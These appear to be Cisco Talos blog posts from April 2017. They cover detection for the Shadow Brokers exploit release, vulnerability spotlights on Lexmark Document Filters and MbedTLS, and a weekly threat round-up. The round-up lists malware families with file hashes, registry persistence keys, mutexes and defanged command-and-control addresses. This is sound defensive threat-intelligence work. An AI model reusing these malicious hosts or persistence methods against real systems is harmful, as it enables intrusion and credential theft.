72e173a8c5828a7eb2f6e29ae047492d7d5ed030d8c126c6259a4be147debcbd
860302d167ec4aad867b193eebc60fca7bf407f01ef58de6957c1b0ff6f5cd7b
914680df0be91b8c175c08ec050d443a60a0b7bfce3bc4136d08d432e0a0d3db
91cd175bddcd53bbafccb70356b9bae310cbadaa864494a19f47a46b5523cda3
99b9911869b733d6cbfeedcdbd9ae165f8250d1b9cfb62af05e314c62d502548
a7227042a9d48e78a696ee0e45066a324b3a0b32ec24b35cf96b38550f991e92
aaa8a4c8afa43f8a0bd5cffb1e1a01dc503d7c9ba4b646789107e12d68f66ab4
aeffb11a5ede257b91c8f1a481ff7c27f74774cb32665d04cf3a92fc9c7be14e
dee2a92b982ee9ad225f8ee7a5b393ce78604cd41f094fa058891e09e97f242d
e3a01bd742364862ea7336574fd030c8e53bfb9819b5458976fe6e7107a120c9
e3ce60862c0d258511c492a03b3adb5d86c665f490fe231997045a1ddf5b2daf
e3e4bbd670fe41e6608b0e17778ddf70b2c2e37591b265bc16089f84ee7ef7fb
ece6551b97bd990b40a78d683943e48313be26a46daeded3b232e4ec47814adf
f873d1bf619f28ac6200d8d669c3bba5bd69b0cdbd513d6d9461bc6c308e416c

Coverage

Screenshots of Detection

↧

Cisco Coverage for Shadow Brokers 2017-04-14 Information Release

April 14, 2017, 11:45 pm

≫ Next: Vulnerability Spotlight: Information Disclosure Vulnerability in Lexmark Perceptive Document Filters

≪ Previous: Threat Round-up for Apr 7 - Apr 14

On Friday, April 14, the actor group identifying itself as the Shadow Brokers released new information containing exploits for vulnerabilities that affect various versions of Microsoft Windows as well as applications such as Lotus Domino. Additionally, the release included previously unknown tools, including an exploitation framework identified as "FUZZBUNCH." Preliminary analysis of the information suggested several of the released exploits were targeting zero-day vulnerabilities. Microsoft has released a statement regarding the newly released exploits targeting Windows and notes that most of them have been previously patched. Talos is aware of this new information disclosure and has responded to ensure our customers are protected from these threats.

Coverage for the exploits and tools disclosed by the Shadow Brokers is available through Cisco's security products, services, and open source technologies. In some cases, coverage for specific tools or vulnerabilities was already available prior to today's information release. In the cases of the exploits dubbed ETERNALCHAMPION and ETERNALBLUE, Talos had pre-existing coverage that detects attempts to exploit these vulnerabilities.

Talos will continue to monitor and analyze this situation for new developments and respond accordingly. As a result, new coverage may be developed or existing coverage adapted and/or modified at a later date. For the most current information, please refer to your Firepower Management Center or Snort.org.

Snort Rules

14782
14783
14896
15015
15930
26643
41978 (for ETERNALCHAMPION and ETERNALBLUE)
42110
42255 (for ESTEEMAUDIT)
42256 (for ETERNALROMANCE and ETERNALSYNNERGY)

AMP Detection Names

W32.Variant:Gen.20fn.1201
W32.GenericKD:Malwaregen.20fo.1201
Win.Trojan.Agent.MRT.Talos
W32.Variant:Gen.20fo.1201
W32.Auto:07b8a1.in03.Talos
W32.Auto:0b3e8a.in03.Talos
W32.Auto:0c9e49.in03.Talos
W32.Generic:EqShellC.20cn.1201
W32.GenericKD:Equdrug.20cp.1201
W32.Malwaregen:Equdrug.20cn.1201
W32.GenericKD:Malwaregen.20cp.1201
W32.Variant.20fn.1201
W32.Auto:1a3acf.in03.Talos
W32.Variant:Malwaregen.20fo.1201
W32.Trojan:Equdrug.20fn.1201
W32.GenericKD:Gen.20cn.1201
W32.Auto:24e0b1.in03.Talos
W32.Malwaregen:Equdrug.20cp.1201
W32.Variant:Equdrug.20cp.1201
W32.Variant:EqCrypA.20df.1201
W32.Generic:Equdrug.20cp.1201
W32.Variant:EqDrugA.20fo.1201
W32.GenericKD:Malwaregen.20fn.1201
W32.Variant:Malwaregen.20fn.1201
W32.Generic:Malwaregen.20cp.1201
W32.Generic:Gen.20cn.1201
W32.Auto:346117.in03.Talos
W32.Variant:Equdrug.20fn.1201
W32.Auto:352ef2.in03.Talos
Auto.3E181CA31F.in10.tht.Talos
W32.Variant:Gen.20cn.1201
W32.GenericKD:Malwaregen.20cs.1201
W32.Auto:4ac6f5.in03.Talos
W32.Auto:4cc308.in03.Talos
W32.4E1DF72362-100.SBX.VIOC
W32.Heur:Malwaregen.20cq.1201
W32.Auto:56254f.in03.Talos
W32.Auto:593415.in03.Talos
W32.5F06EC411F-95.SBX.TG
W32.Auto:6001e8.in03.Talos
W32.Auto:60ea11.in03.Talos
W32.Auto:64ed2c.in03.Talos
W32.Variant:Malwaregen.20cn.1201
W32.Auto:6cd023.in03.Talos
W32.Auto:738348.in03.Talos
W32.Auto:76e02a.in03.Talos
W32.Auto:7901bb.in03.Talos
W32.7B4986AEE8-95.SBX.TG
W32.Auto:7b9bcf.in03.Talos
Auto.7C4F3817C7.in10.tht.Talos
W32.Auto:805848.in03.Talos
W32.Auto:8d28e4.in03.Talos
W32.Auto:907168.in03.Talos
W32.Variant:Generic.20cn.1201
W32.Auto:970df0.in03.Talos
W32.Auto:99339a.in03.Talos
W32.Variant:Equdrug.20fo.1201
W32.Auto:9aa34b.in03.Talos
W32.Auto:9bebd2.in03.Talos
W32.Auto:9ee687.in03.Talos
W32.73252:Equdrug.20fn.1201
W32.Auto:aa4a52.in03.Talos
W32.Auto:aed16a.in03.Talos
W32.Auto:aed477.in03.Talos
W32.Auto:aee118.in03.Talos
W32.B2DAF9058F-95.SBX.TG
W32.Auto:b57181.in03.Talos
W32.Auto:b6f17e.in03.Talos
W32.B7902809A1-95.SBX.TG
W32.Auto:b9d95e.in03.Talos
Auto.C5E119FF7B.in10.tht.Talos
W32.Generic:Malwaregen.20fo.1201
W32.Auto:cca60c.in03.Talos
W32.D382E59854-95.SBX.TG
W32.Auto:d38ce3.in03.Talos
W32.D52CFA731D-100.SBX.VIOC
W32.Auto:d8722d.in03.Talos
W32.Auto:d9f792.in03.Talos
W32.Trojan.20fn.1201
W32.Auto:dc4adc.in03.Talos
W32.Auto:de578a.in03.Talos
W32.Generic:Gen.20fo.1201
W32.E1DFF24AF5-95.SBX.TG
W32.Auto:e9a236.in03.Talos
W32.Auto:ea3b8c.in03.Talos
W32.EF906B8A8A-95.SBX.TG
W32.Auto:f720d9.in03.Talos
W32.F7A886EE10-95.SBX.TG
W32.Malware:Gen.20fn.1201
W32.F8CD0D655F-100.SBX.VIOC
W32.Trojan:Gen.20fn.1201
W32.Generic:Malwaregen.20cn.1201
W32.Auto:fd2efb.in03.Talos

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of malware utilized by threats actors.

The Network Security protection of IPS and NGFW have up-to-date signatures to detect malicious network activity by threat actors.

↧

Vulnerability Spotlight: Information Disclosure Vulnerability in Lexmark Perceptive Document Filters

April 18, 2017, 1:11 pm

≫ Next: Vulnerability Spotlight: ARM Mbedtls x509 ECDSA invalid public key Code Execution Vulnerability

≪ Previous: Cisco Coverage for Shadow Brokers 2017-04-14 Information Release

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

Talos are today releasing a new vulnerability discovered within the Lexmark Perceptive Document Filters library. TALOS-2017-0302 allows for information disclosure using specifically crafted files.

Overview

The vulnerability is present in the Lexmark Document filter parsing engine which is used across a wide range of services such as eDiscovery, DLP, big data, content management and others. The library is commonly used across these services to allow for the deep inspection of a multitude of file formats to offer conversion capabilities such as from Microsoft document formats into other formats. Lexmark make this library available to compete against other third party and open source libraries used for such activities.

Document conversion represents an important aspect of many businesses as they attempt to move from an unstructured data solution to a more workable structured data solution in order to improve business efficiency.

TALOS-2017-0302 Information Disclosure Vulnerability(CVE-2017-2806)

The vulnerability exists in the processing of the IHlink records of Office Art objects embedded in XLS files. The absence of a value sanitization check for variable length fields in a file allows an attacker to create a specially crafted XLS file which causes an arbitrary memory read.

Full details are available here.

Known vulnerable versions

Lexmark Perceptive Document Filters 11.3.0.2228 and 11.3.0.2400.

Discussion

We have previously disclosed vulnerabilities in the Lexmark Perceptive Document Filters library, and written a detailed blog about how we investigate such vulnerabilities.

For successful exploitation of this vulnerability to steal information, an attacker must be able to execute further code on the system, possibly through the exploitation of additional vulnerabilities. However, because the vulnerable library is used by a number of third party products, organisations may be unaware that they are exposed to this vulnerability. As with any patch, an organisation should ensure that patches for any document processing software which may include the Lexmark library are applied as soon as possible.

Lexmark has release "Perceptive Document Filters 11.4.0.2480" to address this issue.

Coverage

The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

Snort Rules: 42137 - 42138

↧

Vulnerability Spotlight: ARM Mbedtls x509 ECDSA invalid public key Code Execution Vulnerability

April 19, 2017, 7:33 am

≫ Next: Threat Round-up for Apr 14 - Apr 21

≪ Previous: Vulnerability Spotlight: Information Disclosure Vulnerability in Lexmark Perceptive Document Filters

Vulnerability Discovered by Aleksandar Nikolic

Overview

Talos is disclosing TALOS-2017-0274/CVE-2017-2784, a code execution vulnerability in ARM MbedTLS. This vulnerability is specifically related to how MbedTLS handles x509 certificates. MbedTLS is an SSL/TLS implementation aimed specifically at embedded devices that was previously known as PolarSSL.

The vulnerability exists in the part of the code responsible for handling elliptic curve cryptography keys. An attacker can trigger this vulnerability by providing a specially crafted x509 certificate to the target which performs a series of checks on the certificate. While performing these checks the application fails to properly parse the public key. This results in the invalid free of a stack pointer. There is a mitigating factor associated with this vulnerability in that the memory space that is pointed to is zeroed out shortly before the vulnerability is triggered. However, since it's designed to be used in embedded platforms that may not have modern heap exploitation mitigations in place it may be possible to achieve code execution in certain circumstances. Full details of the vulnerability are available in our advisory.

Coverage

Snort Rules: 41364

↧

Threat Round-up for Apr 14 - Apr 21

April 21, 2017, 10:30 am

≫ Next: Threat Spotlight: Mighty Morphin Malware Purveyors: Locky Returns Via Necurs

≪ Previous: Vulnerability Spotlight: ARM Mbedtls x509 ECDSA invalid public key Code Execution Vulnerability

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between April 14 and April 21. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your FireSIGHT Management Center, Snort.org, or ClamAV.net.

This week's most prevalent threats are:

Win.Tool.MeterPreter-6294292-0
Hacking tool
Meterpreter is a component of the Metasploit, an exploit framework for pen-testing. Meterpreter is injected through a code injection vulnerability and resides only in memory. The component can be extended at run-time via in-memory DLL injection.
Win.Trojan.VBAttachGeneric
Trojan
Various samples that Talos have observed are polymorphic trojans written in Visual Basic and deliviered via spam campaigns. These samples have been observed creating autostart registry keys to establish persistence as well as injecting code in other processes. These samples also beacon back to remote servers with infection information and to await commands. They also contains anti-vm and anti-debugging techniques to hinder manual and dynamic analysis.
Win.Dropper.Skyneos-6192156-1
Dropper
This malware, written in .NET, is installs "Skyneos V1.0" keylogger on the victim machine. It will also send an email with a subject "TripleXannonymous" to a dedicated mailbox indicating infection occurred, where the email is containing username and computername. It also modifies registry keys accordingly to run.
Win.Trojan.Cybergate-5744895-0
Remote Access Trojan
Cybergate is a Remote Access Trojan that allows attackers to fully control the target system. Functionality includes command shell interaction, screenshot capturing, audio/video capturing, keylogging, as well as uploading/downloading files from the target system.
Win.Ransomware.GX40-6290314-0
Ransomware
GX40 is a Windows ransomware family written in Visual Basic .NET. Samples have been distributed via spam as a fake Windows update tool. Files targeted by extension are encrypted using AES-256 ECB with .encrypted as the new extension. Infected hosts are not locked down, but a ransom prompt is still given upon execution. Some samples request contact by e-mail before providing a Bitcoin address for a payment of 0.02 BTC.
Win.Dropper.Gepys
Dropper
Gepys installs a malicious payload on the victim’s machine, and sets the payload to execute each time the computer is restarted. This dropper can be used to install a variety of malware on the victim’s machine.
Doc.Macro.MaliciousHeuristic-6290326-0
Office Macro
Office macro code is used to further compromise a target system. Macros can leverage external system binaries to execute other binaries to further compromise the system. This signature looks for functionality associated with obfuscating strings to execute a Windows command to download and run another sample.
Win.Trojan.Fareit-6296798-0
Trojan (credential stealer)
This sample attempts to collect stored credentials from a number of installed applications and then attempts to transmit those credentials back to a PHP application on a possibly compromised server.
Doc.Downloader.Powload-6296855-0
Office Macro Obfuscation Heuristic
Office macro code is used to further compromise a target system. This heuristic focuses on macro techniques to obfuscate shell commands by leveraging WinExec from the kernel32 library. This week it has been used to deliver various ransomware families.

Threats

Win.Tool.MeterPreter-6294292-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

Domain Names

File Hashes

b93a5e2c8068b84aca852899b119577fe3da77f4edd01d41ebc1c92abfbb8203
e21ea550d8307956232df048f2623df436d0903666b257eda95962173100a54d
96c3e2c6e428ac63faa88de3970f50f95ff0a224698bd7e299bf7860b387d2f3
6dc3c45ba6aa3b8551843ef5e38c44b3b6c7d1bde0278948270157c676e82d37
59876794db1a73c00735d7c25fb206e4f5b722788f04d5143883f84d825546b7
29e5a7efb03ec69c3bc19756228e232d539f1b3bdb75b6bb00729fc446cdbf1b
148b6f924f612720619b009ef1cc35c060b0e8553cc403b475f7922220b19e99
c8b27b261222a1d20c5e4d7d569e3a6b95ec763c4973e49d077816cfddf826ff
ae52cd09f3fe264ffe9b1c3c4bdfba1dea47ba4c7306792c139d375373de82dc
9de9e23df4712ec2e496155fb4fb851df8976030eaff5c7e955fb4409604395b
02da7a71eb34ba11778c14599915f400a0f5dbd5f02a4175e0892ed752fef28d
0835abebef4c7c0a0808ab2168f1b58c0f6345160b7ccc689a5df2d95e61fa90
08555875425df997fa72dad869f8a7e389809f25cf90c1e2b4e659e7a0128496
1fbaf79cccadca652db1af811d52ea918dbde09518615510f64a7421f32abeee
cc205ab2f88aea3a021dfd9472d6411d0d52a8a3043f992b225169585128a792
de7939ed67925ca1c824d6b0400aa1f2bf6d955db4ce8becb2ae56403e729164
c92a69d11c1ac5f7d209b8b42fd338ea4123e1dc16dc97f7fc06b31ea7ebb7b8
c38ff8ecd12cdd6be79f76cd59c0c7a279fa51bf806a8cad8159366651b58103
43fa6fe9c0374e7ef960994e519868c22bc4115ae05ddb1ef17a972c4bdd6716
f552b77831e3b5577ff40158e417fee5599931d7e3b4c17075eec47520c2b688

Coverage

Detection Screenshots

AMP

ThreatGrid

Win.Trojan.VBAttachGeneric

Indicators of Compromise

Registry Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run - Persistence/Autorun (NAS Manager\[a-z]{6}exe)

Mutexes

IP Addresses

89.35.228[.]198
191.101.243[.]120

Domain Names

css.alminvestmentbnk[.]com

Created Files

C:\Program Files\NAS Manager\[a-z]{6}.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\[a-zA-Z0-9]{8-10}.exe

File Hashes

5514b9f92aecd3b063b3d922dee493ceca4ccfbd0d94b23e506f94c3acdad37c
2d1244bb024cd109e349968a79d0a4d2b9a0490f92f186f4b184326895b33b0b
d375091524f770ee3b648770d9b250f697c5ab6ea64b8768aee9cc0feb7e7632
4bd4bf948e9a0911d21acef4f035145cfeeb76454809edf5675ebb5b41522e2e
754e2d75a93827a5be8194f12e2c28be91b06978c7e95cb862b68e67537c6e2d
b95d95c662abdf6ebdd27c649e6d7d82801f1346f24cee5e9eaf8aefb63a7017
d2ca3c2b3092fc0464c9553f4271aefeb869d1dfcd1c003b80866f0c0f5993c4
3ded24e864722c12ee193bf1481e7f52f901deb9f2babe915668480e02b66f38

Coverage

Detection Screenshots

AMP

ThreatGrid

Umbrella

Win.Dropper.Skyneos-6192156-1

Indicators of Compromise

Registry Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run %APPDATA%\GxBArVz\WJrYnjU.exe

Mutexes

"wJFKrvS"

IP Addresses

Domain Names

File Hashes

397b758eb5d29c3fa73fdb554431b91782e9bacec264c7a9fe23ec636b02c8ad
999040d9e578672b56d3af96b0794bf4943d706f148f551e31f4342ff8d74cde
61fdda35c17936282f1ec22781743d7c81838f9283a219826ca3c4be7c556272
c295a62c605d59335f0dd2f5724a3fbf07c5b71173389be19328f4480ffa63f0
579f2dc6bb11b2b748b29b90262bf4e89d2c7c34ea5176904e43d67cecc9b678
a6e74ddaf03536438b9a2eaf72d06a8e2e6f68d0a9c3656efb64883afafd1709
1ec5eb9ef00ac05b36ff81e4b176254f6028b9b6c1d7cbeb4f67548bcbbf5e1b
2e0fb62b32393f13120c8e3db4bef27794db2c96c8e1fffdd9bdd11eb182a9a8
3cc72f3decf89086593d0e862d2537f81e9f82f862725a1018de32be4c60df6c
19a286089d830dfb9cbfaf24f162249d25ec90f13ca180f5eb106fdb6bb3b36a
839a74407ba04a305cbe37aff2e755d46d5cd44b111e6028aa96f3f51b9a09ff
3ee15dfaa1175b574a8b49dfc13995e2990e97746e318cd132903b18a394eeaf
1bf7821d9cedfd63011f9e9db40bad4153ead19891592ef94d5f997059f1c41a
59dcdff902ba56fb6fd3ba7720333e4b95c1fe11199152fb1af70f71da248904
e5559bee38107824f965c228496b74e1e18fd34a79a405f51ea7062bd923449e
f7549cc0889a19fe0619f0cb9545a7c15e3e4c0b57148fd9919be96c032203f9
032bcc041d877bbf957df93d22390a841700789e46aa2d077cd1db4f2e01e76f
9127163c4c6b96ed1dd2eea39f8fe55d4b3be1cb2590a53d1b454ee93124c4b6
dd8b85b8717fbc0d0579bf5a3a0e526648bf9bedca2bc50d2192b9fd2efa5c4f
0a8151ae2fe8c73935df6986243a8f04c6d7de17ddb0f789c753a64ce5d759c1
20f554732e030e8487efa57725ed1bbff5ff44249da04b41ccf42f099d1ab908
c798f885e301a61ede7b2a479c3b75bede7783d3ab602d65ec352e052c2a24d7
4550b5aa76408a448a11f78a2820135a1f705c21ed47a26daafe9453c3a93e38
9cf9084351c33b1b68131bcb89cbc19b819b8b2b9dcc3e4b889ebac1bf0858af
aab799820d4235808a6508f67fd226bb0fd4e87d744469cd1c582f45dd213c88
384a2a36e466f93a66322d727823f5dba1a477469978116e6a84f9874de00dfe

Coverage

Detection Screenshots

AMP

ThreatGrid

Win.Trojan.Cybergate-5744895-0

Indicators of Compromise

Registry Keys Created

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Name: HKLM
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run
Name: HKCU
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
Name: Policies

Mutexes

***MUTEX***
***MUTEX***_SAIR
_x_X_UPDATE_X_x_
_x_X_PASSWORDLIST_X_x_
_x_X_BLOCKMOUSE_X_x_
***MUTEX***_PERSIST

IP Addresses

187.32.137[.]66

Domain Names

theprojectxgm.ddns[.]net

Files created/modified

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\XX--XX--XX.txt
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\UuU.uUu
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\XxX.xXx
C:\WINDOWS\system32\install\server.exe

File Hashes

684a4dc6bbd6b006e1976107a67bf6e7d7644a3258484c99402ea619f7f2a616

Coverage

Detection Screenshots

AMP

ThreatGrid

Win.Ransomware.GX40-6290314-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

N/A (domains resolve to virtual IP's in use by web hosting providers)

Domain Names

clowntong[.]com
Ganedata.co[.]uk

File Hashes

2d7a92a8ad1271d0544148b7a37de0d2b2180750a6e7753a26f97b801c369fb4
B6cbd7f5f6d9946b27be877ab5bd8205f64a4155ef202694dc2ce9fb2981c18d

Coverage

Detection Screenshots

AMP

ThreatGrid

Umbrella

Malware screenshot

Win.Dropper.Gepys

Indicators of Compromise

Registry Keys

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs
Value: C:\DOCUME~1\ALLUSE~1\APPLIC~1\Mozilla\[a-z]{7}.dll
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\LoadAppInit_DLLs
Value: 1

Mutexes

IP Addresses

Domain Names

File Hashes

50e9012ae2bf0889f21914acf507a91164df7f7afa3faf87e056ec399262198c
2e3462102717bede243945fcb442d5fedabec308ee358a4d47782362ca4aa06e
6428003415cc2338ed842909d930bf16648737f9b82af7802aaf0f6c25df66b1
a8294b03c2de716d7c186229d80fb6f5739911e365ecbd13bfc9156e79c2c3e4
8689ac26e1df50fa5769327042031172820ab34d74caed21b9156923f57e1bbf
91b1a40f59db3af84c4a2bcaca1a2f55a4622e8b42f1ec0675b7634d6b4a932e
554f21359d5e804135cf4f325d6ead010235622a81f310e690538065ec2726bc
31da4ca9abf91af1b5eb5e3b8ff7e046a24bbb56fa3128c48742f47873272f65
f53e78c57cdae3d01337626d38c1ec9d2566114f3f8d3af3da54caa28738edeb

Coverage

Detection Screenshots

AMP

ThreatGrid

Doc.Macro.MaliciousHeuristic-6290326-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

Domain Names

File Hashes

ea8fbf51c26a4bf0c2c09c4eda7dddd84c19a14fd86028e2491a012548aced61
82f052437c190821e209508f80b1c22f982bfb16bd5f8dd9bec9371ac0d1f9c0
4d41f39368c70cb30329b46bddc61d8994590e12ed7c4181f82f5d3f90442efb
8ccc7718cc590a00857a7ff73a6c8acda01ac7b8460c179e514eff3fbc658d29
415e1d148165148bd9f9d4312e95a685ceb16640e2f3e99171af19d7d06a58eb
88a37526f9769ee9ef2cdd4a98974f17284ff293f29131ec7cdd3b3ec34ab076
3ebe2e91598125856058fc251594864936f28a4dc0c173f163f77532090e751d
d4d73c48982729d1b8baa017c250d25302bb8d57eaf84f802e612d2f4d0533ff
1ce183c58bf4440d6928b299b4c6ba20325949dee7c2d103a1f81e716045db4a
43ab5ad6cb9d059ce1f745d80f45749b8d3b583bf2e8ef4e5a737cfb8cd920ef
9dd198863c3e54750fab21ac6521affc9a1dac3124fbbee6eab8d58aecee26bd
20b8c96f5ebdf2fa2ec337552a8b990bb04706b47872a6e6f57141885c6627e6
7767aad9c2b271c58eaa9bc69a4d02788c8f179690bc62eb50c0ce1e01a28093
07b70b5ee017779746bb9d429684cb9f6cc892b43364db00813a0dd8c78c94c4
ac13f9fe491790e443557df4b43b0dee394a556493940de8544dccf21d9f4468
ce4374e2bc2852dfb9a947d3d5a450c9882f78c7a2cce9bd9bc38c52519c0f5a
dfae08da81b55aad202cd4a58a03793dade7670c489466215fda8889e78c9257
5e16067776a303af01c7b07edb1a9ed1c704a836b52a86be9b4331d2f1337727
0e78873a05f6b38784d3046fa474e4e2ef5cd8ffba224d481aeeb861445140d2
e3554e7023a05caed3f5cecdd14bde1f8bff36ddf5fa6655f05394f5874cdee3
84f6eaa6667202884b1f44e188f2d32da28d7e94aea45c1eed2c167fdf0adff9
b09f8f8cd3310f52f0be8fbbc06fa4dfe320e01809ef029cf0bf834c9ec30e46
5464f9a1167e2262f229b43e96cf4398a68762419cb5b130b62af7bc5c81ee9f
95fe51428511126edc0405420fd8dd130668558f678ef2b15acee4123daf77ec
3a8a64289bf5486bf4ad9cc7e2dac095e924dd9c91f28b53b4733af62063a586
ef50419714e8bbc98855570dea4841fe92b87af93eaa2dcbed9443195dbed565
9046275b47f332504800cd9427f32a729babac0fc47e987b99947e2c36720271
b2d970b4acbc75627355562e21de446c9c77c1e9664f0cdcbefd65947a98286e
85b0a49b0b04bb75e1fc7fe0600170195982e88312a51f61b87c795380d0cb27
5be9d79d1a933264a704cfbfe547fabfd00f5729a69056a5eae3af4907a19c05
32d3690ff19448cba8472963eda694168933946ae667f175ec0e36418af2b656
533c687050b73cb187b6cf2fa5638d4bc775f7815c5c49070f93f60714f615a8
cf2f1603fd0f0160cee318cec9dda36c9dd016b0aa68bca33010a7b8114327db
238668f1f9b65de23d738c101f49e3daaf38af67bc3a799e8449844c008d6e0b
bae085920e1f9e860d81a8b05ef4339e51c4e7dbe1a4877daf323f783fd66693
de875b6a133e995fa40b82e6ed0e82a618b46596114ab818cfbc3074d675c9f3
1ba3ac6d485f56467096ff921fc3291c9f29e544f26db29b41db7557f234fbdc
cb145d2bcb45fdfadde9835a625a35d4211bc9fe7a2570e6a895516ae92839eb
e9677396d0f743adde90fb25e83ba96f3d080004d3974dc88440c7a023a050a3
36d4d582d371baff6b8ca10c22bac318012665045283fe5c76da1caa6249945a
56b9ea97db50ea45ceb0a60b28a4964e93f5eff91e1d8048a6fb3d1182a18824
6c23937fb1280d15a7fa631f30a7af9daa667973ed40ed8952f0b9cdf9711bba
8d8fb5aa93d435834cc6660a795ab79f00f2c5b12a5ddb7fe043576cd65c4903
8080348ccd9330a532af3f3aca0bdae15379984b7063db5d9427114b045fcc32
d75b43df6ded6c683665c7ac5cb21607cd898b2614988bb0eff9565cd33b56ef
5e1117f72ad7da6e62a73a7038e5c619631fc97612632943da70e3b1f08a8614
18932143798d8cffbe4fd93e2593f6ff7a92e30fcbc85b181b08eeb1dd227c50
9559c2b404c9006ee4fd6d68caab17e0191d98468031ff67c0a2ae29dfb8ddea
5c8c09baf59378e5868bc3b69039aa2ef30d5bce59907f0af53a6dff5ede012e
1ddbba660d6bd0db2411cecf7ea02989f18653f3f8fd6007a2ec6a49ef7e044e
c566ab01110368bfc7123389a5fc77bbcbe0760f57e0981621bc0eef13bce5a8
0ac1c753602492a9eb9390daf7c6ab644155f29e32b32fd5b5792c17c251d86e
797e7d7b1b113665481cac3562d685591a44df06b2323b4371f3ac14415308b6
8ec6a7b8a22a1c786d9dcdc89b16ccd70e1a91ac8a2a11cd8b4d413a116879a0

Coverage

Detection Screenshots

ThreatGrid

Malware Screenshot

Win.Trojan.Fareit-6296798-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

5.153.47[.]230

Domain Names

dondada.acurdem.com[.]ng

File Hashes

ce405ebd2475244959da62f23f45dce072a7d2c13bf08c09ea34d6a8d60ac49e

Coverage

Detection Screenshots

AMP

ThreatGrid

Umbrella

Doc.Downloader.Powload-6296855-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

Domain Names

File Hashes

0039b96405d8827aca9232f7bb94a5c71a75dd5c965cd229b22458ebb97911ca
02abe3625a2acb2e670cfc36f7a4f1d82fbe61ff1fea9ad5ec5096f37ccbfb70
030ff53ce613c122f12fd7569eab3ce8364080c62fbe508ccc974ef9342642fb
0491be85530667942df61a503c92146ac9b46f7b0313c920fa22de66a603fcf9
051afb7fcf6222f23d4752a84dc5940ed0d0aaa42f6ad13c18891196792c6456
06d4f59d6613c8710f920ee40d24a7259818def35905c624097b5ec65535feaf
077fbc7279205df5108eb9f86a3dc89acbc175bb7927218081de340162049d23
079cdfa884bea9771ee7c4f28ac70a658ac9782ddd62ab441ac7bfc3489cd873
07b045365e3608f3e3086bf7efbf826eceda05f8c5d30e36737ade5f7cf6c3ea
0936af07881f8656370603ffcfd0b057d308036e3444c38fa3f653990545a0d9
094acc57fb5fea958dc5be48d809546bfd38cd69e3bac0f3b5cbc6c04b0ab854
0960b6a40b7a4af9b0cd3636b7ace16b61909beb4fbb69b04e20f0daf4f612ea
09f795f22dd14bd06f7f4bac5ea3c58342410fc737797e6f57c020051df18274
0b8ac08140a7e02dc07a16210f373291072bbf6117e5331c799cf403b13c431d
0d27447dd3fc4f06a213a1076699b83df36723888190a521f863e966214c7c08
0dc7b93f915809d75194bee4a9674cdd328bc0c39a554c06c6062b7c6e6ebf22
0e8713ef446741ccf60d854d604dc5de66a73699745a6bb818de9fa624b001c0
106bee1d44995470a414cbbfff03fd71f8d1293d737f85ddc417df80cb3fbf19
110f982d95a3f7691d312852b34505407fcd84b0f92d931e699fbf0cde7459c5
127e2da8450815f2568dd0e3d0e6fb567b2b2bf661bae9ab1630976c4850704b
1349c9c178f7d3e92e577661917c376a8bf98b4d1ebcd66f2a211366ed29c23c
159f013169e83d8a1f1dde7536766ac398ea29b5394ec592da27ab974d528658
170af256b8d1ffb867075ecefbd03e9f4b55539ab4359d3bfde03a9edd575257
18da3338acc46e910909b45b524d20bbbd1e5e158943c6fe303373e7bcf53588
1aa3369ab9d458e5b8a45b0b9ce30946aafaac7d409ccf9767c7c02d94f099fb
1b8511f04d8b6ad0b4bbc70f4d641f6200edde4cd6db5b6011026372538fe361
1ca749c7aeedc86e2884f64041ed67bed5e618cc79733ca932e31a893d2763f2
227379a1e5dd52d2767e1b39f2bcde391fcacdcb102edff5e8850d01a06de175
23af47d6ca64082566f6674e7330ae26b891afb6ee8491da991241ee4bcc2610
252b68dda98ca46e5ee2987870f69dd300ee055699597fc692389fb19fe1d36b
26c5dafca0d786d46d84a2e1d45425c4db58d6f714b28bf5874e205c5c0d7f59
277c524f46c02c613219971445127f83b5df38a5256ff02ed9dd77540244ef7c
2b3540b9f5b6a4565af3a46041d5349157ddb231be7549ed3bc0aa45a0c3d027
2cbc366467f9fbd1b15f89d0310f079ee1c2dfb4a6b8a8ecc1ca305af4cd48f2
2cf059d33afc0e4ec2fef33143cb35f71ca5dc1198944b70c7483ed9bbfd3f24
2cf081278bbc033b39d7db71be4f73918047f795d09ac5b080dac81817b63c9d
2d339b0cafc46e90d44f654d4ddd6a4cb63f49e948c88a14aa8170988b93e299
2f1c3767da55c730e7953e3211b9e55633d9e5cd4acd20bf0321ad38a6f1406b
31be9f322e520a47744e19bd3dd994581111aaa02532543c5df712d864448626
330d4427ea82ef90565c815f7f84263d4a73ae9b3418e371f4d3903e0300f8eb
33310bba1c3b525385e422221dc3d4ea94dc0d034f436a72b6cf9256f8db4913
33ad98d01e9a607be3ccc82bd3c2b57bc5fc0882783719d00effeff64d55c722
3482fd6b720f33fac957070682c423a3fe1562e18bf2d65ce85eb8635e3cfd57
37fc4a1534288a0afc74f9143b6afa94cd566cc04129fffceb2cb29d8fb60ad9
397ad1783d16f3c53cc97882b3ac79149f4f752b8e63aaf1f8bcc200b24919d6

Coverage

